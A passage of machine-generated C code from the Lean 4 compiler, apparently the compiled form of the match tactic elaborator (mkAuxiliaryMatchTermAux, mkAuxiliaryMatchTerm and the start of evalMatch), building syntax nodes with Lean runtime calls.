lean_object* x_140; lean_object* x_141; lean_object* x_142; lean_object* x_143; lean_object* x_144; lean_object* x_145; lean_object* x_146; lean_object* x_147; lean_object* x_148; lean_object* x_149; lean_object* x_150; lean_object* x_151; lean_object* x_152; lean_object* x_153; lean_object* x_154; lean_object* x_155; lean_object* x_156; lean_object* x_157; lean_object* x_158; lean_object* x_159; lean_object* x_160; lean_object* x_161; lean_object* x_162; lean_object* x_163; lean_object* x_164; lean_object* x_165; lean_object* x_166; lean_object* x_167; lean_object* x_168; lean_object* x_169; lean_object* x_170; lean_object* x_171; lean_object* x_172; lean_object* x_173; lean_object* x_174; lean_object* x_175; lean_object* x_176; lean_object* x_177; lean_object* x_178; lean_object* x_179; lean_object* x_180; lean_object* x_181; x_124 = lean_ctor_get(x_61, 0); x_125 = lean_ctor_get(x_61, 1); lean_inc(x_125); lean_inc(x_124); lean_dec(x_61); x_126 = l_Lean_Parser_Tactic_case___closed__1; lean_inc(x_124); x_127 = lean_alloc_ctor(2, 2, 0); lean_ctor_set(x_127, 0, x_124); 
lean_ctor_set(x_127, 1, x_126); x_128 = lean_array_push(x_50, x_127); x_129 = lean_array_push(x_128, x_59); x_130 = lean_unsigned_to_nat(2u); x_131 = l_Lean_Syntax_getArg(x_28, x_130); x_132 = l_Lean_Syntax_getHeadInfo(x_131); lean_dec(x_131); x_133 = l_myMacro____x40_Init_Notation___hyg_13352____closed__13; x_134 = lean_alloc_ctor(2, 2, 0); lean_ctor_set(x_134, 0, x_132); lean_ctor_set(x_134, 1, x_133); x_135 = lean_array_push(x_129, x_134); x_136 = l_Lean_Parser_Tactic_eraseAuxDiscrs___elambda__1___closed__5; lean_inc(x_124); x_137 = lean_alloc_ctor(2, 2, 0); lean_ctor_set(x_137, 0, x_124); lean_ctor_set(x_137, 1, x_136); x_138 = lean_array_push(x_50, x_137); x_139 = l_Lean_Parser_Tactic_eraseAuxDiscrs___elambda__1___closed__2; x_140 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_140, 0, x_139); lean_ctor_set(x_140, 1, x_138); x_141 = lean_array_push(x_50, x_140); x_142 = l_myMacro____x40_Init_Notation___hyg_15419____closed__12; lean_inc(x_124); x_143 = lean_alloc_ctor(2, 2, 0); lean_ctor_set(x_143, 0, x_124); lean_ctor_set(x_143, 1, x_142); x_144 = lean_array_push(x_50, x_143); x_145 = l_Lean_nullKind___closed__2; x_146 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_146, 0, x_145); lean_ctor_set(x_146, 1, x_144); x_147 = lean_array_push(x_141, x_146); x_148 = l_Lean_groupKind___closed__2; x_149 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_149, 0, x_148); lean_ctor_set(x_149, 1, x_147); x_150 = lean_array_push(x_50, x_149); x_151 = l_prec_x28___x29___closed__3; lean_inc(x_124); x_152 = lean_alloc_ctor(2, 2, 0); lean_ctor_set(x_152, 0, x_124); lean_ctor_set(x_152, 1, x_151); x_153 = lean_array_push(x_50, x_152); x_154 = lean_array_push(x_153, x_30); x_155 = l_prec_x28___x29___closed__7; x_156 = lean_alloc_ctor(2, 2, 0); lean_ctor_set(x_156, 0, x_124); lean_ctor_set(x_156, 1, x_155); x_157 = lean_array_push(x_154, x_156); x_158 = l_Lean_Parser_Tactic_paren___closed__1; x_159 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_159, 0, x_158); lean_ctor_set(x_159, 1, x_157); x_160 
= lean_array_push(x_50, x_159); x_161 = l_myMacro____x40_Init_Notation___hyg_1481____closed__8; x_162 = lean_array_push(x_160, x_161); x_163 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_163, 0, x_148); lean_ctor_set(x_163, 1, x_162); x_164 = lean_array_push(x_150, x_163); x_165 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_165, 0, x_145); lean_ctor_set(x_165, 1, x_164); x_166 = lean_array_push(x_50, x_165); x_167 = l_Lean_Parser_Tactic_myMacro____x40_Init_Notation___hyg_16699____closed__5; x_168 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_168, 0, x_167); lean_ctor_set(x_168, 1, x_166); x_169 = lean_array_push(x_50, x_168); x_170 = l_Lean_Parser_Tactic_myMacro____x40_Init_Notation___hyg_16699____closed__3; x_171 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_171, 0, x_170); lean_ctor_set(x_171, 1, x_169); x_172 = lean_array_push(x_135, x_171); x_173 = l_Lean_Parser_Tactic_case___closed__2; x_174 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_174, 0, x_173); lean_ctor_set(x_174, 1, x_172); x_175 = lean_ctor_get(x_125, 0); lean_inc(x_175); x_176 = lean_ctor_get(x_125, 1); lean_inc(x_176); if (lean_is_exclusive(x_125)) { lean_ctor_release(x_125, 0); lean_ctor_release(x_125, 1); x_177 = x_125; } else { lean_dec_ref(x_125); x_177 = lean_box(0); } x_178 = lean_array_push(x_176, x_174); if (lean_is_scalar(x_177)) { x_179 = lean_alloc_ctor(0, 2, 0); } else { x_179 = x_177; } lean_ctor_set(x_179, 0, x_175); lean_ctor_set(x_179, 1, x_178); x_180 = l_Lean_Syntax_setArg(x_28, x_29, x_58); x_181 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_181, 0, x_180); lean_ctor_set(x_181, 1, x_179); x_16 = x_181; x_17 = x_62; goto block_25; } } else { lean_object* x_182; lean_object* x_183; uint8_t x_184; lean_object* x_185; x_182 = lean_array_get_size(x_2); x_183 = lean_unsigned_to_nat(1u); x_184 = lean_nat_dec_lt(x_183, x_182); lean_dec(x_182); lean_inc(x_6); x_185 = l_Lean_MonadRef_mkInfoFromRefPos___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__1(x_6, x_7, 
x_8); if (x_184 == 0) { lean_object* x_186; lean_object* x_187; lean_object* x_188; uint8_t x_189; lean_dec(x_6); x_186 = lean_ctor_get(x_185, 0); lean_inc(x_186); x_187 = lean_ctor_get(x_185, 1); lean_inc(x_187); lean_dec(x_185); lean_inc(x_1); x_188 = l_Lean_mkIdentFrom(x_30, x_1); lean_dec(x_30); x_189 = !lean_is_exclusive(x_186); if (x_189 == 0) { lean_object* x_190; lean_object* x_191; lean_object* x_192; lean_object* x_193; lean_object* x_194; lean_object* x_195; lean_object* x_196; lean_object* x_197; uint8_t x_198; x_190 = lean_ctor_get(x_186, 0); x_191 = lean_ctor_get(x_186, 1); x_192 = l_stx___x3f___closed__3; x_193 = lean_alloc_ctor(2, 2, 0); lean_ctor_set(x_193, 0, x_190); lean_ctor_set(x_193, 1, x_192); x_194 = l_Array_empty___closed__1; x_195 = lean_array_push(x_194, x_193); x_196 = lean_array_push(x_195, x_188); x_197 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_197, 0, x_31); lean_ctor_set(x_197, 1, x_196); x_198 = !lean_is_exclusive(x_191); if (x_198 == 0) { lean_object* x_199; lean_object* x_200; lean_object* x_201; x_199 = lean_ctor_get(x_191, 0); x_200 = lean_nat_add(x_199, x_183); lean_dec(x_199); lean_ctor_set(x_191, 0, x_200); x_201 = l_Lean_Syntax_setArg(x_28, x_29, x_197); lean_ctor_set(x_186, 0, x_201); x_16 = x_186; x_17 = x_187; goto block_25; } else { lean_object* x_202; lean_object* x_203; lean_object* x_204; lean_object* x_205; lean_object* x_206; x_202 = lean_ctor_get(x_191, 0); x_203 = lean_ctor_get(x_191, 1); lean_inc(x_203); lean_inc(x_202); lean_dec(x_191); x_204 = lean_nat_add(x_202, x_183); lean_dec(x_202); x_205 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_205, 0, x_204); lean_ctor_set(x_205, 1, x_203); x_206 = l_Lean_Syntax_setArg(x_28, x_29, x_197); lean_ctor_set(x_186, 1, x_205); lean_ctor_set(x_186, 0, x_206); x_16 = x_186; x_17 = x_187; goto block_25; } } else { lean_object* x_207; lean_object* x_208; lean_object* x_209; lean_object* x_210; lean_object* x_211; lean_object* x_212; lean_object* x_213; lean_object* x_214; 
lean_object* x_215; lean_object* x_216; lean_object* x_217; lean_object* x_218; lean_object* x_219; lean_object* x_220; lean_object* x_221; x_207 = lean_ctor_get(x_186, 0); x_208 = lean_ctor_get(x_186, 1); lean_inc(x_208); lean_inc(x_207); lean_dec(x_186); x_209 = l_stx___x3f___closed__3; x_210 = lean_alloc_ctor(2, 2, 0); lean_ctor_set(x_210, 0, x_207); lean_ctor_set(x_210, 1, x_209); x_211 = l_Array_empty___closed__1; x_212 = lean_array_push(x_211, x_210); x_213 = lean_array_push(x_212, x_188); x_214 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_214, 0, x_31); lean_ctor_set(x_214, 1, x_213); x_215 = lean_ctor_get(x_208, 0); lean_inc(x_215); x_216 = lean_ctor_get(x_208, 1); lean_inc(x_216); if (lean_is_exclusive(x_208)) { lean_ctor_release(x_208, 0); lean_ctor_release(x_208, 1); x_217 = x_208; } else { lean_dec_ref(x_208); x_217 = lean_box(0); } x_218 = lean_nat_add(x_215, x_183); lean_dec(x_215); if (lean_is_scalar(x_217)) { x_219 = lean_alloc_ctor(0, 2, 0); } else { x_219 = x_217; } lean_ctor_set(x_219, 0, x_218); lean_ctor_set(x_219, 1, x_216); x_220 = l_Lean_Syntax_setArg(x_28, x_29, x_214); x_221 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_221, 0, x_220); lean_ctor_set(x_221, 1, x_219); x_16 = x_221; x_17 = x_187; goto block_25; } } else { lean_object* x_222; lean_object* x_223; lean_object* x_224; lean_object* x_225; lean_object* x_226; lean_object* x_227; lean_object* x_228; uint8_t x_229; x_222 = lean_ctor_get(x_185, 0); lean_inc(x_222); x_223 = lean_ctor_get(x_185, 1); lean_inc(x_223); lean_dec(x_185); x_224 = lean_ctor_get(x_6, 0); lean_inc(x_224); lean_dec(x_6); x_225 = l_Lean_Elab_Term_initFn____x40_Lean_Elab_Match___hyg_7269____closed__1; x_226 = l_Lean_Name_appendIndexAfter(x_225, x_224); x_227 = l_Lean_Name_append(x_1, x_226); x_228 = l_Lean_mkIdentFrom(x_30, x_227); lean_dec(x_30); x_229 = !lean_is_exclusive(x_222); if (x_229 == 0) { lean_object* x_230; lean_object* x_231; lean_object* x_232; lean_object* x_233; lean_object* x_234; lean_object* x_235; 
lean_object* x_236; lean_object* x_237; uint8_t x_238; x_230 = lean_ctor_get(x_222, 0); x_231 = lean_ctor_get(x_222, 1); x_232 = l_stx___x3f___closed__3; x_233 = lean_alloc_ctor(2, 2, 0); lean_ctor_set(x_233, 0, x_230); lean_ctor_set(x_233, 1, x_232); x_234 = l_Array_empty___closed__1; x_235 = lean_array_push(x_234, x_233); x_236 = lean_array_push(x_235, x_228); x_237 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_237, 0, x_31); lean_ctor_set(x_237, 1, x_236); x_238 = !lean_is_exclusive(x_231); if (x_238 == 0) { lean_object* x_239; lean_object* x_240; lean_object* x_241; x_239 = lean_ctor_get(x_231, 0); x_240 = lean_nat_add(x_239, x_183); lean_dec(x_239); lean_ctor_set(x_231, 0, x_240); x_241 = l_Lean_Syntax_setArg(x_28, x_29, x_237); lean_ctor_set(x_222, 0, x_241); x_16 = x_222; x_17 = x_223; goto block_25; } else { lean_object* x_242; lean_object* x_243; lean_object* x_244; lean_object* x_245; lean_object* x_246; x_242 = lean_ctor_get(x_231, 0); x_243 = lean_ctor_get(x_231, 1); lean_inc(x_243); lean_inc(x_242); lean_dec(x_231); x_244 = lean_nat_add(x_242, x_183); lean_dec(x_242); x_245 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_245, 0, x_244); lean_ctor_set(x_245, 1, x_243); x_246 = l_Lean_Syntax_setArg(x_28, x_29, x_237); lean_ctor_set(x_222, 1, x_245); lean_ctor_set(x_222, 0, x_246); x_16 = x_222; x_17 = x_223; goto block_25; } } else { lean_object* x_247; lean_object* x_248; lean_object* x_249; lean_object* x_250; lean_object* x_251; lean_object* x_252; lean_object* x_253; lean_object* x_254; lean_object* x_255; lean_object* x_256; lean_object* x_257; lean_object* x_258; lean_object* x_259; lean_object* x_260; lean_object* x_261; x_247 = lean_ctor_get(x_222, 0); x_248 = lean_ctor_get(x_222, 1); lean_inc(x_248); lean_inc(x_247); lean_dec(x_222); x_249 = l_stx___x3f___closed__3; x_250 = lean_alloc_ctor(2, 2, 0); lean_ctor_set(x_250, 0, x_247); lean_ctor_set(x_250, 1, x_249); x_251 = l_Array_empty___closed__1; x_252 = lean_array_push(x_251, x_250); x_253 = 
lean_array_push(x_252, x_228); x_254 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_254, 0, x_31); lean_ctor_set(x_254, 1, x_253); x_255 = lean_ctor_get(x_248, 0); lean_inc(x_255); x_256 = lean_ctor_get(x_248, 1); lean_inc(x_256); if (lean_is_exclusive(x_248)) { lean_ctor_release(x_248, 0); lean_ctor_release(x_248, 1); x_257 = x_248; } else { lean_dec_ref(x_248); x_257 = lean_box(0); } x_258 = lean_nat_add(x_255, x_183); lean_dec(x_255); if (lean_is_scalar(x_257)) { x_259 = lean_alloc_ctor(0, 2, 0); } else { x_259 = x_257; } lean_ctor_set(x_259, 0, x_258); lean_ctor_set(x_259, 1, x_256); x_260 = l_Lean_Syntax_setArg(x_28, x_29, x_254); x_261 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_261, 0, x_260); lean_ctor_set(x_261, 1, x_259); x_16 = x_261; x_17 = x_223; goto block_25; } } } } else { lean_object* x_262; lean_dec(x_30); x_262 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_262, 0, x_28); lean_ctor_set(x_262, 1, x_6); x_16 = x_262; x_17 = x_8; goto block_25; } block_25: { lean_object* x_18; lean_object* x_19; size_t x_20; size_t x_21; lean_object* x_22; lean_object* x_23; x_18 = lean_ctor_get(x_16, 0); lean_inc(x_18); x_19 = lean_ctor_get(x_16, 1); lean_inc(x_19); lean_dec(x_16); x_20 = 1; x_21 = x_4 + x_20; x_22 = x_18; x_23 = lean_array_uset(x_15, x_4, x_22); x_4 = x_21; x_5 = x_23; x_6 = x_19; x_8 = x_17; goto _start; } } } } static lean_object* _init_l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___boxed__const__1() { _start: { size_t x_1; lean_object* x_2; x_1 = 0; x_2 = lean_box_usize(x_1); return x_2; } } lean_object* l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4, lean_object* x_5) { _start: { lean_object* x_6; lean_object* x_7; lean_object* x_8; lean_object* x_9; lean_object* x_10; lean_object* x_11; size_t x_12; lean_object* x_13; lean_object* x_14; lean_object* x_15; lean_object* x_16; lean_object* x_17; lean_object* x_18; 
x_6 = lean_unsigned_to_nat(4u); x_7 = l_Lean_Syntax_getArg(x_2, x_6); x_8 = lean_unsigned_to_nat(0u); x_9 = l_Lean_Syntax_getArg(x_7, x_8); lean_dec(x_7); x_10 = l_Lean_Syntax_getArgs(x_9); lean_dec(x_9); x_11 = lean_array_get_size(x_10); x_12 = lean_usize_of_nat(x_11); lean_dec(x_11); lean_inc(x_10); x_13 = x_10; x_14 = lean_box_usize(x_12); x_15 = l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___boxed__const__1; x_16 = lean_alloc_closure((void*)(l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___boxed), 8, 5); lean_closure_set(x_16, 0, x_1); lean_closure_set(x_16, 1, x_10); lean_closure_set(x_16, 2, x_14); lean_closure_set(x_16, 3, x_15); lean_closure_set(x_16, 4, x_13); x_17 = x_16; x_18 = lean_apply_3(x_17, x_3, x_4, x_5); if (lean_obj_tag(x_18) == 0) { uint8_t x_19; x_19 = !lean_is_exclusive(x_18); if (x_19 == 0) { lean_object* x_20; uint8_t x_21; x_20 = lean_ctor_get(x_18, 0); x_21 = !lean_is_exclusive(x_20); if (x_21 == 0) { lean_object* x_22; lean_object* x_23; lean_object* x_24; lean_object* x_25; lean_object* x_26; lean_object* x_27; lean_object* x_28; lean_object* x_29; lean_object* x_30; lean_object* x_31; x_22 = lean_ctor_get(x_20, 0); x_23 = l_myMacro____x40_Init_Notation___hyg_13954____closed__2; x_24 = l_Lean_Syntax_setKind(x_2, x_23); x_25 = l_Lean_nullKind; x_26 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_26, 0, x_25); lean_ctor_set(x_26, 1, x_22); x_27 = l_Lean_mkOptionalNode___closed__2; x_28 = lean_array_push(x_27, x_26); x_29 = l_myMacro____x40_Init_Notation___hyg_13954____closed__8; x_30 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_30, 0, x_29); lean_ctor_set(x_30, 1, x_28); x_31 = l_Lean_Syntax_setArg(x_24, x_6, x_30); lean_ctor_set(x_20, 0, x_31); return x_18; } else { lean_object* x_32; lean_object* x_33; lean_object* x_34; lean_object* x_35; lean_object* x_36; lean_object* x_37; lean_object* x_38; lean_object* x_39; lean_object* x_40; 
lean_object* x_41; lean_object* x_42; lean_object* x_43; x_32 = lean_ctor_get(x_20, 0); x_33 = lean_ctor_get(x_20, 1); lean_inc(x_33); lean_inc(x_32); lean_dec(x_20); x_34 = l_myMacro____x40_Init_Notation___hyg_13954____closed__2; x_35 = l_Lean_Syntax_setKind(x_2, x_34); x_36 = l_Lean_nullKind; x_37 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_37, 0, x_36); lean_ctor_set(x_37, 1, x_32); x_38 = l_Lean_mkOptionalNode___closed__2; x_39 = lean_array_push(x_38, x_37); x_40 = l_myMacro____x40_Init_Notation___hyg_13954____closed__8; x_41 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_41, 0, x_40); lean_ctor_set(x_41, 1, x_39); x_42 = l_Lean_Syntax_setArg(x_35, x_6, x_41); x_43 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_43, 0, x_42); lean_ctor_set(x_43, 1, x_33); lean_ctor_set(x_18, 0, x_43); return x_18; } } else { lean_object* x_44; lean_object* x_45; lean_object* x_46; lean_object* x_47; lean_object* x_48; lean_object* x_49; lean_object* x_50; lean_object* x_51; lean_object* x_52; lean_object* x_53; lean_object* x_54; lean_object* x_55; lean_object* x_56; lean_object* x_57; lean_object* x_58; lean_object* x_59; x_44 = lean_ctor_get(x_18, 0); x_45 = lean_ctor_get(x_18, 1); lean_inc(x_45); lean_inc(x_44); lean_dec(x_18); x_46 = lean_ctor_get(x_44, 0); lean_inc(x_46); x_47 = lean_ctor_get(x_44, 1); lean_inc(x_47); if (lean_is_exclusive(x_44)) { lean_ctor_release(x_44, 0); lean_ctor_release(x_44, 1); x_48 = x_44; } else { lean_dec_ref(x_44); x_48 = lean_box(0); } x_49 = l_myMacro____x40_Init_Notation___hyg_13954____closed__2; x_50 = l_Lean_Syntax_setKind(x_2, x_49); x_51 = l_Lean_nullKind; x_52 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_52, 0, x_51); lean_ctor_set(x_52, 1, x_46); x_53 = l_Lean_mkOptionalNode___closed__2; x_54 = lean_array_push(x_53, x_52); x_55 = l_myMacro____x40_Init_Notation___hyg_13954____closed__8; x_56 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_56, 0, x_55); lean_ctor_set(x_56, 1, x_54); x_57 = l_Lean_Syntax_setArg(x_50, x_6, x_56); if 
(lean_is_scalar(x_48)) { x_58 = lean_alloc_ctor(0, 2, 0); } else { x_58 = x_48; } lean_ctor_set(x_58, 0, x_57); lean_ctor_set(x_58, 1, x_47); x_59 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_59, 0, x_58); lean_ctor_set(x_59, 1, x_45); return x_59; } } else { uint8_t x_60; lean_dec(x_2); x_60 = !lean_is_exclusive(x_18); if (x_60 == 0) { return x_18; } else { lean_object* x_61; lean_object* x_62; lean_object* x_63; x_61 = lean_ctor_get(x_18, 0); x_62 = lean_ctor_get(x_18, 1); lean_inc(x_62); lean_inc(x_61); lean_dec(x_18); x_63 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_63, 0, x_61); lean_ctor_set(x_63, 1, x_62); return x_63; } } } } lean_object* l_Lean_MonadRef_mkInfoFromRefPos___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__1___boxed(lean_object* x_1, lean_object* x_2, lean_object* x_3) { _start: { lean_object* x_4; x_4 = l_Lean_MonadRef_mkInfoFromRefPos___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__1(x_1, x_2, x_3); lean_dec(x_2); return x_4; } } lean_object* l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___boxed(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4, lean_object* x_5, lean_object* x_6, lean_object* x_7, lean_object* x_8) { _start: { size_t x_9; size_t x_10; lean_object* x_11; x_9 = lean_unbox_usize(x_3); lean_dec(x_3); x_10 = lean_unbox_usize(x_4); lean_dec(x_4); x_11 = l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2(x_1, x_2, x_9, x_10, x_5, x_6, x_7, x_8); lean_dec(x_2); return x_11; } } lean_object* l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTerm_match__1___rarg(lean_object* x_1, lean_object* x_2) { _start: { lean_object* x_3; lean_object* x_4; lean_object* x_5; x_3 = lean_ctor_get(x_1, 0); lean_inc(x_3); x_4 = lean_ctor_get(x_1, 1); lean_inc(x_4); lean_dec(x_1); x_5 = 
lean_apply_2(x_2, x_3, x_4); return x_5; } } lean_object* l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTerm_match__1(lean_object* x_1) { _start: { lean_object* x_2; x_2 = lean_alloc_closure((void*)(l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTerm_match__1___rarg), 2, 0); return x_2; } } static lean_object* _init_l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTerm___closed__1() { _start: { lean_object* x_1; lean_object* x_2; lean_object* x_3; x_1 = lean_unsigned_to_nat(1u); x_2 = l_Array_empty___closed__1; x_3 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_3, 0, x_1); lean_ctor_set(x_3, 1, x_2); return x_3; } } lean_object* l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTerm(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4) { _start: { lean_object* x_5; lean_object* x_6; x_5 = l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTerm___closed__1; x_6 = l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux(x_1, x_2, x_5, x_3, x_4); if (lean_obj_tag(x_6) == 0) { lean_object* x_7; lean_object* x_8; uint8_t x_9; x_7 = lean_ctor_get(x_6, 0); lean_inc(x_7); x_8 = lean_ctor_get(x_7, 1); lean_inc(x_8); x_9 = !lean_is_exclusive(x_6); if (x_9 == 0) { lean_object* x_10; uint8_t x_11; x_10 = lean_ctor_get(x_6, 0); lean_dec(x_10); x_11 = !lean_is_exclusive(x_7); if (x_11 == 0) { lean_object* x_12; lean_object* x_13; x_12 = lean_ctor_get(x_7, 1); lean_dec(x_12); x_13 = lean_ctor_get(x_8, 1); lean_inc(x_13); lean_dec(x_8); lean_ctor_set(x_7, 1, x_13); return x_6; } else { lean_object* x_14; lean_object* x_15; lean_object* x_16; x_14 = lean_ctor_get(x_7, 0); lean_inc(x_14); lean_dec(x_7); x_15 = lean_ctor_get(x_8, 1); lean_inc(x_15); lean_dec(x_8); x_16 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_16, 0, x_14); lean_ctor_set(x_16, 1, x_15); lean_ctor_set(x_6, 0, x_16); return x_6; } } else { lean_object* x_17; lean_object* 
x_18; lean_object* x_19; lean_object* x_20; lean_object* x_21; lean_object* x_22; x_17 = lean_ctor_get(x_6, 1); lean_inc(x_17); lean_dec(x_6); x_18 = lean_ctor_get(x_7, 0); lean_inc(x_18); if (lean_is_exclusive(x_7)) { lean_ctor_release(x_7, 0); lean_ctor_release(x_7, 1); x_19 = x_7; } else { lean_dec_ref(x_7); x_19 = lean_box(0); } x_20 = lean_ctor_get(x_8, 1); lean_inc(x_20); lean_dec(x_8); if (lean_is_scalar(x_19)) { x_21 = lean_alloc_ctor(0, 2, 0); } else { x_21 = x_19; } lean_ctor_set(x_21, 0, x_18); lean_ctor_set(x_21, 1, x_20); x_22 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_22, 0, x_21); lean_ctor_set(x_22, 1, x_17); return x_22; } } else { uint8_t x_23; x_23 = !lean_is_exclusive(x_6); if (x_23 == 0) { return x_6; } else { lean_object* x_24; lean_object* x_25; lean_object* x_26; x_24 = lean_ctor_get(x_6, 0); x_25 = lean_ctor_get(x_6, 1); lean_inc(x_25); lean_inc(x_24); lean_dec(x_6); x_26 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_26, 0, x_24); lean_ctor_set(x_26, 1, x_25); return x_26; } } } } lean_object* l_Lean_Elab_Tactic_evalMatch_match__1___rarg(lean_object* x_1, lean_object* x_2) { _start: { lean_object* x_3; lean_object* x_4; lean_object* x_5; x_3 = lean_ctor_get(x_1, 0); lean_inc(x_3); x_4 = lean_ctor_get(x_1, 1); lean_inc(x_4); lean_dec(x_1); x_5 = lean_apply_2(x_2, x_3, x_4); return x_5; } } lean_object* l_Lean_Elab_Tactic_evalMatch_match__1(lean_object* x_1) { _start: { lean_object* x_2; x_2 = lean_alloc_closure((void*)(l_Lean_Elab_Tactic_evalMatch_match__1___rarg), 2, 0); return x_2; } } lean_object* l_Lean_throwError___at_Lean_Elab_Tactic_evalMatch___spec__2(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4, lean_object* x_5, lean_object* x_6, lean_object* x_7, lean_object* x_8, lean_object* x_9, lean_object* x_10) { _start: { lean_object* x_11; lean_object* x_12; uint8_t x_13; x_11 = lean_ctor_get(x_8, 3); x_12 = l_Lean_addMessageContextFull___at_Lean_Meta_instAddMessageContextMetaM___spec__1(x_1, x_6, x_7, x_8, x_9, 
x_10); x_13 = !lean_is_exclusive(x_12); if (x_13 == 0) { lean_object* x_14; lean_object* x_15; x_14 = lean_ctor_get(x_12, 0); lean_inc(x_11); x_15 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_15, 0, x_11); lean_ctor_set(x_15, 1, x_14); lean_ctor_set_tag(x_12, 1); lean_ctor_set(x_12, 0, x_15); return x_12; } else { lean_object* x_16; lean_object* x_17; lean_object* x_18; lean_object* x_19; x_16 = lean_ctor_get(x_12, 0); x_17 = lean_ctor_get(x_12, 1); lean_inc(x_17); lean_inc(x_16); lean_dec(x_12); lean_inc(x_11); x_18 = lean_alloc_ctor(0, 2, 0); lean_ctor_set(x_18, 0, x_11); lean_ctor_set(x_18, 1, x_16); x_19 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_19, 0, x_18); lean_ctor_set(x_19, 1, x_17); return x_19; } } } lean_object* l_Lean_throwErrorAt___at_Lean_Elab_Tactic_evalMatch___spec__1(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4, lean_object* x_5, lean_object* x_6, lean_object* x_7, lean_object* x_8, lean_object* x_9, lean_object* x_10, lean_object* x_11) { _start: { uint8_t x_12; x_12 = !lean_is_exclusive(x_9); if (x_12 == 0) { lean_object* x_13; lean_object* x_14; lean_object* x_15; x_13 = lean_ctor_get(x_9, 3); x_14 = l_Lean_replaceRef(x_1, x_13); lean_dec(x_13); lean_ctor_set(x_9, 3, x_14); x_15 = l_Lean_throwError___at_Lean_Elab_Tactic_evalMatch___spec__2(x_2, x_3, x_4, x_5, x_6, x_7, x_8, x_9, x_10, x_11); lean_dec(x_9); return x_15; } else { lean_object* x_16; lean_object* x_17; lean_object* x_18; lean_object* x_19; lean_object* x_20; lean_object* x_21; lean_object* x_22; lean_object* x_23; lean_object* x_24; lean_object* x_25; lean_object* x_26; x_16 = lean_ctor_get(x_9, 0); x_17 = lean_ctor_get(x_9, 1); x_18 = lean_ctor_get(x_9, 2); x_19 = lean_ctor_get(x_9, 3); x_20 = lean_ctor_get(x_9, 4); x_21 = lean_ctor_get(x_9, 5); x_22 = lean_ctor_get(x_9, 6); x_23 = lean_ctor_get(x_9, 7); lean_inc(x_23); lean_inc(x_22); lean_inc(x_21); lean_inc(x_20); lean_inc(x_19); lean_inc(x_18); lean_inc(x_17); lean_inc(x_16); lean_dec(x_9); x_24 = 
